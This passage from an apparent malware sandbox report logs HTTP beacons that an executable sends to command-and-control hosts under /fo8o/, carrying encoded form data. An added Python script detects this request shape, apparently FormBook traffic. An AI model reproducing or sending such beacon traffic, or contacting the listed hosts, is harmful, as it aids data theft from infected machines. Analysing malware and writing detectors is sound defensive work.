            Aug 2, 2024 13:51:08.821152925 CEST | 1078 | IN | Data Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf
            Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            2 | 192.168.2.6 | 49724 | 52.25.92.0 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:10.737643957 CEST | 810 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.kasegitai.tokyo
            Origin: http://www.kasegitai.tokyo
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.kasegitai.tokyo/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 61 50 67 6a 55 6c 57 4c 64 77 4c 39 56 62 4e 69 52 31 31 35 59 66 6a 57 6e 42 41 63 64 55 44 72 35 61 41 7a 63 56 2f 4b 33 69 4f 77 3d 3d
            Data Ascii: blWd=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwaPgjUlWLdwL9VbNiR115YfjWnBAcdUDr5aAzcV/K3iOw==
            Aug 2, 2024 13:51:11.366204977 CEST | 1236 | IN | HTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:51:11 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED]
            Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC*@Ei*)Y1bF)x0Hp&*T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#|p`-/->7HK" M0v.\&Qv1F|X|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFU*WW+&m>l(KH 2V;M<B]|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv|)O/^=(7R%,s|!; [TRUNCATED]
            Aug 2, 2024 13:51:11.366221905 CEST | 1078 | IN | Data Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf
            Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            3 | 192.168.2.6 | 49725 | 52.25.92.0 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:13.270243883 CEST | 1823 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.kasegitai.tokyo
            Origin: http://www.kasegitai.tokyo
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.kasegitai.tokyo/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 45 2f 41 56 6c 75 46 42 62 61 65 6d 4f 43 67 30 6b 56 61 66 56 31 48 2b 4a 73 4b 6a 74 4a 72 59 4d 53 6f 77 58 6e 57 61 59 70 41 4c 64 62 4e 47 4e 35 33 62 32 47 63 2f 57 71 46 6a 52 35 78 62 6d 48 78 65 69 51 6f 32 45 61 62 30 4a 6f 6c 4f 46 4d 75 6f 33 2f 39 63 64 79 6e 30 6e 68 4e 4c 56 46 70 4e 72 4d 73 30 30 44 4e 56 7a 57 6d 4b 6c 30 63 58 52 55 4f 77 45 39 73 51 2b 4b 64 73 75 43 68 6e 52 64 44 34 34 7a 64 49 53 30 33 77 48 4a 62 32 66 58 6a 77 32 71 35 35 5a 56 4e 64 61 32 59 [TRUNCATED]
            Data Ascii: blWd=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLE/AVluFBbaemOCg0kVafV1H+JsKjtJrYMSowXnWaYpALdbNGN53b2Gc/WqFjR5xbmHxeiQo2Eab0JolOFMuo3/9cdyn0nhNLVFpNrMs00DNVzWmKl0cXRUOwE9sQ+KdsuChnRdD44zdIS03wHJb2fXjw2q55ZVNda2YQVKohE7DA48Al1Ls1G3ckJ6bmm5PbIwFfYhhJWuqRqOccvvso1C25ZE+zb/G6GyONDu40a9xyZFOk1i5kdy6YOxF737AFW5aKBjciPwPW0lfXjqT0Plq9R2RUBktgloVMj6UEVo/s4tz9E1w1tDuaqqjxTRDx1w9YPE2wyQLLjYj3kUUHdbEK9Ptlc9VSB899BW1UKsT/FUeX5X4Hmd7t0Fa3B/YwGWpZnWZy06W065uXfCfSbry0czK10hWa/o6xXsyzfprP80Lb80p05H2FJjnUqKgnXBhSL7HNhS+puhii+dRg/FEaSbYVEfnXeXqoBcZoSDOQSeB8H8W/8IJc2L9Jq4BX+v/ztC8TXNo4vpDNIlyWuSR/jAh7tEGH9lWybVmlBeMYUyRUEFF2BeH3xTaX0FToHkjxiNc5qeYFMxZiB0uRimlRoC1pjAwFzK1HLPvYcB+fcIHq7pJus/IF5FTHnh0/1YNBx5Tmxc9KEm3KwEOXF38bFvpfQ99mYj7Iv2xoKFdgn8Tafw6J0/+SUE2Cu5zYMn+MRNkWvvI/wAMSGlvEeuGhVBXfjl6/XENY5J9R3ySB1FZm3HoIxSmCcNBbCXxfTRQolJR9U5BtM8ic4+eMzC6ktGQm08oL8AzrPZkz7c+lX7TGvvMs3JAF9ov75UC6MHOhE [TRUNCATED]
            Aug 2, 2024 13:51:13.877974033 CEST | 1236 | IN | HTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:51:13 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED]
            Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC*@Ei*)Y1bF)x0Hp&*T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#|p`-/->7HK" M0v.\&Qv1F|X|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFU*WW+&m>l(KH 2V;M<B]|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv|)O/^=(7R%,s|!; [TRUNCATED]
            Aug 2, 2024 13:51:13.878010988 CEST | 1078 | IN | Data Raw: 75 0b b6 3d d8 35 d6 c0 4c 83 14 1d 0e 11 0c d2 4c f5 b9 83 19 33 eb 5e 7d 67 08 d3 eb 3d e0 35 ce 18 6f 81 67 f1 07 32 06 fb ae c8 f8 1a 3c bb 77 af 6c 7d f4 50 76 1e c1 73 eb d6 df 54 1c 64 f2 9b 67 77 ae cb f8 33 19 7f 2e e3 1b 32 fe 54 c6 bf
            Data Ascii: u=5LL3^}g=5og2<wl}PvsTdgw3.2TEeu__0(:V!qFT8&][' gnl0q!^]gVY9,o]y[O[E2$.2RP!z2y G2C2RKR;


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            4 | 192.168.2.6 | 49726 | 52.25.92.0 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:15.802732944 CEST | 526 | OUT | GET /fo8o/?blWd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.kasegitai.tokyo
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:51:16.663819075 CEST | 1236 | IN | HTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:51:16 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Data Raw: 31 30 64 33 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 70 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 21 2d 2d 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 39 5d 3e 0a 09 3c 73 74 [TRUNCATED]
            Data Ascii: 10d3<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>403 Forbidden</title><link rel="stylesheet" type="text/css" href="/style.css">...<meta name="robots" content="noindex" />-->...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]-->... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MLXKCD66');</script>... End Google Tag Manager --></head>...<body class="blackboard">--><body class="tokyo1">... Google Tag Manager (noscript) --><noscript><iframe src="https://www.googletagmanager.com/ns.htm [TRUNCATED]
            Aug 2, 2024 13:51:16.663844109 CEST | 1236 | IN | Data Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e
            Data Ascii: yle="display:none;visibility:hidden"></iframe></noscript>... End Google Tag Manager (noscript) --><a href="https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886" target="_blank" class="bnrLink"><img src="https:/
            Aug 2, 2024 13:51:16.664000034 CEST | 1236 | IN | Data Raw: 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 5f 61 72 65 61 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 61 6b 6b 6f 6d 61 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63
            Data Ascii: <div class="img_area"><a href="https://rakkoma.com/" target="_blank"><img src="/img/rakko_img01.png" alt="M&A"></a><a href="https://rakkoma.com/" target="_blank"><img src="/img/rakko_img02.png" alt="
            Aug 2, 2024 13:51:16.664016008 CEST | 793 | IN | Data Raw: 29 3b 0a 09 24 28 22 62 6f 64 79 20 68 65 61 64 65 72 22 29 2e 66 69 74 54 65 78 74 28 35 2e 36 2c 20 7b 20 6d 69 6e 46 6f 6e 74 53 69 7a 65 3a 20 27 38 70 78 27 2c 20 6d 61 78 46 6f 6e 74 53 69 7a 65 3a 20 27 32 34 70 78 27 20 7d 29 3b 0a 3c 2f
            Data Ascii: );$("body header").fitText(5.6, { minFontSize: '8px', maxFontSize: '24px' });</script>...[if lt IE 9]><script src="/FitText.js-master/html5.js"></script><![endif]--><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]
            Aug 2, 2024 13:51:16.665667057 CEST | 1236 | IN | HTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:51:16 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Data Raw: 31 30 64 33 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 70 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 21 2d 2d 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 39 5d 3e 0a 09 3c 73 74 [TRUNCATED]
            Data Ascii: 10d3<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>403 Forbidden</title><link rel="stylesheet" type="text/css" href="/style.css">...<meta name="robots" content="noindex" />-->...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]-->... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MLXKCD66');</script>... End Google Tag Manager --></head>...<body class="blackboard">--><body class="tokyo1">... Google Tag Manager (noscript) --><noscript><iframe src="https://www.googletagmanager.com/ns.htm [TRUNCATED]

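Sessions 0 to 4 above show the check-in shape that makes this traffic recognisable regardless of which host answers: every request goes to the same short directory (/fo8o/) on a changing Host, carries a fixed Internet Explorer 8 User-Agent and Connection: close, and is either a GET with one short fixed value (Ixe=Apq4tPPXNdTp2) plus one long base64-looking value (blWd=...), or a POST whose form body is a single base64-looking blWd= value with Origin and Referer built from the Host and path. The responses vary (a gzip-compressed 200 from one host, a provider's "403 Forbidden" page from another), so the response status alone does not identify the live C2; the request shape does. The following is an added example, not code from the Joe Sandbox report or from the malware: a small raw-HTTP parser and a trait matcher run over the GET from session 0 and the first POST from session 1 (copied from the page) and over a constructed benign request. `parse_request`, `formbook_traits` and `is_beacon` are this example's own names, and the match patterns and the alert threshold are assumptions derived from the sessions shown, not a published signature.

```python
"""Request-shape detection for the beacons in the sessions above (added example)."""
import re

IE8_UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
          ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
          "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)")
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")   # long base64-looking value
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")        # e.g. /fo8o/ (assumed pattern)


def _raw(request_line, headers, body=""):
    """Assemble a wire-format HTTP/1.1 request for the samples below."""
    return request_line + "\r\n" + "\r\n".join(headers) + "\r\n\r\n" + body


# Copied from session 0 (GET) and session 1 (first POST) above.
GET_BEACON = _raw(
    "GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1",
    ["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
     "Accept-Language: en-US,en", "Host: www.3xfootball.com", "Connection: close",
     "User-Agent: " + IE8_UA])
POST_BEACON = _raw(
    "POST /fo8o/ HTTP/1.1",
    ["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
     "Accept-Language: en-US,en", "Accept-Encoding: gzip, deflate, br",
     "Host: www.kasegitai.tokyo", "Origin: http://www.kasegitai.tokyo",
     "Cache-Control: no-cache", "Connection: close",
     "Content-Type: application/x-www-form-urlencoded", "Content-Length: 209",
     "Referer: http://www.kasegitai.tokyo/fo8o/", "User-Agent: " + IE8_UA],
    "blWd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98")
# Constructed benign request for comparison.
BENIGN = _raw("GET /index.html HTTP/1.1",
              ["Host: www.example.com", "User-Agent: curl/8.5.0", "Accept: */*"])


def _form(s):
    """Split k=v&k=v without URL-decoding, so '+' and '/' in base64 survive."""
    out = {}
    for part in s.split("&"):
        if part:
            k, _, v = part.partition("=")
            out[k] = v
    return out


def parse_request(raw):
    """Parse one wire-format HTTP request into method, path, query, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": _form(query),
            "headers": headers, "body": _form(body)}


def formbook_traits(req):
    """Return the list of beacon traits (as seen in the sessions above) the request matches."""
    h, hits = req["headers"], []
    if h.get("user-agent") == IE8_UA:
        hits.append("fixed IE8 user-agent")
    if h.get("connection", "").lower() == "close":
        hits.append("connection: close")
    if SHORT_DIR.match(req["path"]):
        hits.append("short alphanumeric directory")
    params = req["query"] if req["method"] == "GET" else req["body"]
    blobs = [k for k, v in params.items() if B64_BLOB.match(v)]
    if req["method"] == "GET" and len(params) == 2 and len(blobs) == 1:
        hits.append("GET: one short id + one base64 blob")
    if (req["method"] == "POST" and len(params) == 1 and len(blobs) == 1
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")):
        hits.append("POST: single base64 form field")
    host = h.get("host", "")
    if (host and h.get("origin") == "http://" + host
            and h.get("referer") == "http://" + host + req["path"]):
        hits.append("origin/referer derived from host+path")
    return hits


def is_beacon(req, threshold=4):
    """Alert when enough traits line up; the threshold is an assumed tuning value."""
    return len(formbook_traits(req)) >= threshold


if __name__ == "__main__":
    for label, raw in (("GET", GET_BEACON), ("POST", POST_BEACON), ("benign", BENIGN)):
        req = parse_request(raw)
        print(label, req["headers"].get("host"), is_beacon(req), formbook_traits(req))
```

The GET matches four traits and the POST five, while the benign request matches none. Keying on the request shape rather than on the host list is what keeps the rule useful when the sample's domain list changes; the fixed User-Agent and the `blWd=` blob are the two cheapest things to check at a proxy, and the Origin/Referer synthesised from the Host is the one a browser would not produce for a top-level GET of a fresh site.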

            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            5 | 192.168.2.6 | 49728 | 116.50.37.244 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:22.062978029 CEST | 804 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.goldenjade-travel.com
            Origin: http://www.goldenjade-travel.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.goldenjade-travel.com/fo8o/
